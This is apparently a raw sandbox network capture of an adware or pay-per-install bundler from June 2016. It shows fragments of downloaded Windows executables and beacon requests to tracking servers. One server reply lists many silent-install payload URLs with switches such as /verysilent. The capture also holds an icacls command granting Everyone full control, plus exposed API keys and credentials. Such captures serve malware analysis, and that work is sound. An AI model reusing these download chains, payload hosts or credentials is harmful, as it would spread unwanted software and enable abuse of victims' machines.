......]..............U..Q.M..E.P.M.......M...$.B..E...]..............U
..Q.M..E...$.B..M........].....U..Q.M..M.......E....t..M.Q.5.......E..
.].......U...E...P.M.Q.U.R..$.....]......U...E...P.M.Q.U.R.*......]...
...U......E..E..M.....M..U.f..f.E..E..f.}..u..M. M....M..E...].....U..
.E.P.M.Q.U.R.l......]........U...E.P.M.Q.U.R.l......]........U...E..M.
f..f..]................U..Q.M..E...D>C..M..A......U..B......E..
<<< skipped >>>


GET /SysInfo/countup.php?sid=554655542 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Mon, 20 Jun 2016 14:05:57 GMT
Content-Type: application/octet-stream
Content-Length: 549001
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=1znQuZItQ
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<...x...x
...x.......z...x...........i...,...t.......y...Richx..................
.PE..L......K.................\....9.....?2.......p....@..............
............P|..............................................s.......@|
......................................................................
........p...............................text....[.......\.............
..... ..`.rdata.......p.......`..............@[email protected]..........
[email protected]:..........................rsrc......
..@|......v..............@..@.........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
Pr@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@
..u....E..9}[email protected].}[email protected]
[email protected]@.W...E..E.h [email protected]...\r@._
^3.[.....L$...'z...Si.....VW.T.....tO.q.3.;5.'z.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.'z.r._^[...U..QQ.U.SV..i.
<<< skipped >>>


GET /download/3/wizzcaster.exe HTTP/1.1
Host: dl.wizzuniquify.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:51 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
5a400..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...t.gW................................. ........@.. .................
[email protected]............
......................................................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@[email protected].....................
[email protected];...........8...F...
........................................(i...*.&.(......*...0..9......
..~.........,".r...p.....(....o....s............~..... ..*....0.......
....~..... ..*.".......*....0...........~..... ..*.".(.....*...Vs....(
....t.........*..^.(........}......}....*.0............{....(....t....
.s......{.......o......rA..po......rK..po........ijo......o...........
..io..........,...o.......o....t........o....s....o.......... ...*....
.....R..c......".(.....*....0...........(.....s......o.....*.....(....
~....%-.&~..........s....%.....o.....*....s.........*".(.....*....0...
.........o......o....r...po........,.........%..,.o.........s....( ...
r...p(!....(".....o#.............. #...........o........,...........X.
......i2..........,.... A...o$........o%..... .............io&...&..('
.........,...o........*..........*........0..z......... . ...%.1...((.
..}........ ...%.2...((...}.....(......s).......{.....{....o*...}.....
..{.....{....o ...}.....s,...}....*...0...........s).....o-.....o.
<<< skipped >>>

GET /download/3/wizzcasterUninstaller.exe HTTP/1.1


Host: dl.wizzuniquify.com


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:51 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
1fc00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...L.gW.........."...0.................. ... ....@.. .................
......`[email protected].... .......
................@.....................................................
.. ............... ..H............text........ ...................... 
..`.rsrc........ ......................@[email protected].......@.............
[email protected]........$...............:.......
........................................0..!.........(.........~.....(
.............*...................&.(......*...0..9........~.........,"
.r...p.....(....o....s............~..... ..*....0...........~..... ..*
".......*.0...........~..... ..*".(.....*Vs....(....t.........*...0..3
........(.......o......s......o......o......o ....... ...*".(.....*.0.
.J..............,..r9..ps!...z.(".....o#..........,..rg..ps!...z......
..%...o$...&*...0..q........ ..... V... 9...o%......r...p.(%...(&.....
,....r...p.(%...(....&....X..r...p('.........-....X.........-.... ...*
....0........... ..... b... E...o%......r...p.(%...(&.....,!...r...p.(
%...((....Y()...(....&....X..r...p('.........-....X.. ..........-.... 
...*....0............s*.......o .....o,.... ..*.0............(-.....(.
....o/...s0.... o1....s2...%.o3....%.o4.......(.....o/...o5.....s6....
.....s7.......i.5.............io8.......o ......o ....(9........o:...r
 ..p(;...o<..... ...*.0..~.......r/..p.....ri..p.....r...p.....
<<< skipped >>>


GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.8.0
Date: Mon, 20 Jun 2016 14:05:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Location: hXXp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=
0......


GET /Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Mon, 20 Jun 2016 14:05:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
48d..hXXp://dl.wizzuniquify.com/download/1/spacesoundpro-installer.exe
../S CMI3 3..hXXp://mobilitydata5.com/SysInfo/countup.php?sid=55465554
2..hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7In
NpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNp
bGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOG
MzNmMzMGU1In0..hXXp://software-repository.com/Generic/zgm.php?sid=8100
001../install..hXXp://down.eszju.cn/8001/ttwifi.exe..{5DB9279D5A0CB29A
A3ED55D055708882}..hXXp://down.hejie123.com/global/AutoTime51477.exe..
hXXps://vnl1.izabelcoin.com/vnl1.exe../PID=1670 /S..hXXp://livestatsco
unter.com/SysInfo/validator/timer.php..hXXp://livestatscounter.com/Gen
eric/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2..hXXp://dl.samplayeed
med.com/download/dwn/firas/en/setup_mpck_en.exe../verysilent..hXXp://d
own.hejie123.com/global/yeaplayer.exe..hXXp://VVV.lvqifa.com/ucni.exe.
.hXXp://cloudfront.prepucepro.com/download/EasyHotSpot_6db194f1efc3e9e
3f.exe../VERYSILENT clickmein 4..hXXp://b2-31d2.kxcdn.com/B2.exe..http
://cpa.downworld.cc/smss.exe..hXXp://d11m2p9mpffp32.cloudfront.net/mai
n/clc_lj.exe../c=clc /i=301 /s..0..HTTP/1.1 200 OK..Server: nginx/1.8.
0..Date: Mon, 20 Jun 2016 14:05:45 GMT..Content-Type: text/html..Trans
fer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.3
2..48d..hXXp://dl.wizzuniquify.com/download/1/spacesoundpro-installer.
exe../S CMI3 3..hXXp://mobilitydata5.com/SysInfo/countup.php?sid=55465
5542..hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ
<<< skipped >>>


GET /download/1/wizzproduct.exe HTTP/1.1
Host: dl.we-want-it.xyz
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:48 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
18c00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...9.gW.........."...0..r............... ........@.. .................
...................@.................................`...O............
.......................(..............................................
.. ............... ..H............text....q... ...r.................. 
..`.rsrc................t..............@[email protected].....................
[email protected]........$...............9...V...
........................................0..!.........(.........~.....(
.............*...................&.(......*...0..9........~.........,"
.r...p.....(....o....s............~..... ..*....0...........~..... ..*
".......*.0...........~..... ..*".(.....*Vs....(....t.........*...0..3
........(.......o......s......o......o......o........ ...*".(.....*.0.
.J..............,..r9..ps....z.( .....o!..........,..rg..ps....z......
..%...o"...&*...0..q........ ..... V... 9...o#......r...p.(#...($.....
,....r...p.(#...(....&....X..r...p(%.........-....X.........-.... ...*
....0........... ..... b... E...o#......r...p.(#...($.....,!...r...p.(
#...(&....Y('...(....&....X..r...p(%.........-....X.. ..........-.... 
...*....0............s(.......o).....o*.... ..*.0............( .....(,
....o-...s..... o/....s0...%.o1....%.o2.......(,....o-...o3.....s4....
.....s5.......i.2.............io6.......o.......o.....(7........o8...r
 ..p(9...o:..... ...*.0..~.......r/..p.....ri..p.....r...p.....r..
<<< skipped >>>


GET /6usnmh78bx79c2vnsdkr4173rqlzjce2i5jm8lb2agyh69dpi9shb1490yo2hx3hhl52youffqvkfkkf?f_sid=1203893 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: evfomo.ru


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Mon, 20 Jun 2016 14:04:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Access-Control-Allow-Origin: *
Set-Cookie: undefined
Content-Encoding: gzip
149............%.[o.0....Bx..QI03...ZT..`\..B....u......vr.y.t&....%..
wI.7B....dA.....<[..... .obt....y=...<!.......$3!.7.J"h'^.......
."[email protected].{..F.v...*......w./}.................L....
....mv...U5..,.....F....e..-.. .....M.........0d.........feSk....g~.za
TB?*.$V...3......*...t'.....4.....\HD.h..TQ......../.]".t.....0..HTTP/
1.1 200 OK..Server: nginx/1.8.1..Date: Mon, 20 Jun 2016 14:04:08 GMT..
Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-
alive..Vary: Accept-Encoding..Cache-Control: no-cache..Expires: -1..Pr
agma: no-cache..Access-Control-Allow-Origin: *..Set-Cookie: undefined.
.Content-Encoding: gzip..149............%.[o.0....Bx..QI03...ZT..`\..B
....u......vr.y.t&....%..wI.7B....dA.....<[..... .obt....y=...<!
.......$3!.7.J"h'^........"[email protected].{..F.v...*......w
./}.................L........mv...U5..,.....F....e..-.. .....M........
.0d.........feSk....g~.zaTB?*.$V...3......*...t'.....4.....\HD.h..TQ..
....../.]".t.....0..



POST /api/v1/configuration?username=csdi&password=68b07047-1e8d-47ef-8332-09a2c83ad539 HTTP/1.1
Content-Type: text/xml
Host: wizzcaster.com
Content-Length: 0
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:53 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=eyJpdiI6Ikt1NExETTM3RmVDVHN5cVFpY2k0TGc9PSIsInZhbHVlIjoidm5oWXJIY0VRd1ZBbUFOc28yWDEySFV2N1E1aVVYTks3SXhCT2g1NFJpQjZcL2Q4NVROcUYwRXFRd3dUQVNtcFN3RnpSbkpPSXFZUm8yVkJaZ3BkZkJnPT0iLCJtYWMiOiI0MmQ4NjllZjRlY2Q4ZjhhODZjYTk2NDJlNTE5MjE4YWEzMjUyZjQwNzJkMDhlYWZiNDE2N2IyMmM1NTU0Nzk0In0=; expires=Mon, 20-Jun-2016 16:05:53 GMT; Max-Age=7200; path=/; httponly
Content-Length: 135
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/json
{"username":"csdi","api_key":"56f25c2b4eced","wizztracki_user_name":"c
sdi","wizztracki_api_key":"e3b93cef-8bd4-11e5-8538-0cc47a47968c"}t>....


POST /api/v2/ads?user_name=csdi&api_key=56f25c2b4eced&days_after_install=0 HTTP/1.1


Content-Type: text/xml
Host: wizzcaster.com
Content-Length: 0


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:53 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=eyJpdiI6Ilp3eHZRbGtwK2owbmdiQTJVd3hyZGc9PSIsInZhbHVlIjoidjQwS3E2dU10YnFmVXJMMUdwb3FyZ05abDJiVHpJU0FaMXF5aU9rOXZXQkJsM2JtcVAwNDRVZkxwUkM2NEtpcE5BQ0dacVhGVU1VZkFRTzFlK2JzTFE9PSIsIm1hYyI6IjM1MjYwMjc5Yzk3ZDg0N2ViY2M3YzczNzE4NGFjN2VkOTBkN2VmZmRjYjIwMGE3ODRjZjI2ODE3YjRiOGVjZDUifQ==; expires=Mon, 20-Jun-2016 16:05:53 GMT; Max-Age=7200; path=/; httponly
Content-Length: 1210
Content-Type: application/json
{"time_between_prints":"10","print_list":[{"link":"http:\/\/VVV.adnetw
orkperformance.com\/a\/display.php?r=1203893","campaign_id":"67","camp
aign_config_id":"404","max_show_per_day_per_user":"30","max_show_per_d
ay_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time
":"00:00:00","end_time":"00:00:00"},{"link":"http:\/\/VVV.terraclicks.
com\/watch?key=ce879c0c81171a2b08325be280eca96a","campaign_id":"120","
campaign_config_id":"402","max_show_per_day_per_user":"30","max_show_p
er_day_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_
time":"00:00:00","end_time":"00:00:00"},{"link":"http:\/\/VVV.xmediase
rve.com\/apu.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popunder
=1&direct=1","campaign_id":"68","campaign_config_id":"403","max_show_p
er_day_per_user":"30","max_show_per_day_total":"2147483647","ie":"1","
chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00
"},{"link":"http:\/\/n162adserv.com\/ads?key=0a36c0d49f7b6df6a133b2276
2c71970&ch=&width=0&height=0","campaign_id":"65","campaign_config_id":
"382","max_show_per_day_per_user":"8","max_show_per_day_total":"214748
3647","ie":"1","chrome":"1","firefox":"1","start_time":"00:00:00","end
_time":"00:00:00"}]}..
<<< skipped >>>


POST /csdi/wizzcaster/67 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:06:03 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=in6as10pk3btep139lnt1gh4m5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 20 Jun 2016 1
4:06:03 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=in6
as10pk3btep139lnt1gh4m5; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..C
ontent-Type: text/html; charset=UTF-8..{"message":"Track was added"}..



POST /csdi/wizzcaster/67 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:06:03 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=5nmm2ujj85c2sarmcprv5arhg2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 20 Jun 2016 1
4:06:03 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=5nm
m2ujj85c2sarmcprv5arhg2; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..C
ontent-Type: text/html; charset=UTF-8..{"message":"Track was added"}..



POST /Um7UdXgzvHWLL7R/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 222
Cache-Control: no-cache

{"data":"{\"channel_id\":\"\",\"event_event_id\":\"5857\",\"utm_addition\":\"?ver=20161904_0803_cp&verinst=20160620_1406\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 200 OK
Server: openresty/1.9.7.3
Date: Mon, 20 Jun 2016 14:05:57 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
{"Status":"OK"}....


POST /Um7UdXgzvHWLL7R/ HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: events.datahouse-us.com
Content-Length: 345
Cache-Control: no-cache

{"data":"{\"channel_id\":\"\",\"event_event_id\":\"5892\",\"utm_addition\":\"?Error execute [icacls.exe "%Program Files%\CleanBrowser" /t /c /grant *S-1-1-0:(OI)(CI)F /inheritance:e] command. error=2&ver=20161904_0803_cp&verinst=20160620_1406\",\"guid\":\"75ed9567-aa58-4c8e-a8ea-3cad7c47ab03\",\"browser_name\":\"\"}","table":"event_has_user"}
HTTP/1.1 400 Bad Request
Server: openresty/1.9.7.3
Date: Mon, 20 Jun 2016 14:05:57 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 47
Connection: keep-alive
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Error decoding request body: Unexpected token C..



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:05:44 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:05:45 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Mon, 20 Jun 2016 14:05:45 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 191
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.wizzuniquify.com/download/1/spacesoundpro-installer.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:05:46 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Mon, 20 Jun 2016 14:05:46 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 204
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.wizzuniquify.com/download/1/spacesoundpro-installer.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:05:57 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Mon, 20 Jun 2016 14:05:57 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 184
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:05:58 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Mon, 20 Jun 2016 14:05:58 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 197
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:06:09 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Mon, 20 Jun 2016 14:06:09 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 346
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:06:16 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Mon, 20 Jun 2016 14:06:16 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:06:26 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Mon, 20 Jun 2016 14:06:26 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 184
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://software-repository.com/Generic/zgm.php?sid=8100001&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:06:27 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Mon, 20 Jun 2016 14:06:27 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 197
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://software-repository.com/Generic/zgm.php?sid=8100001&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Mon, 20 Jun 2016 14:06:37 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
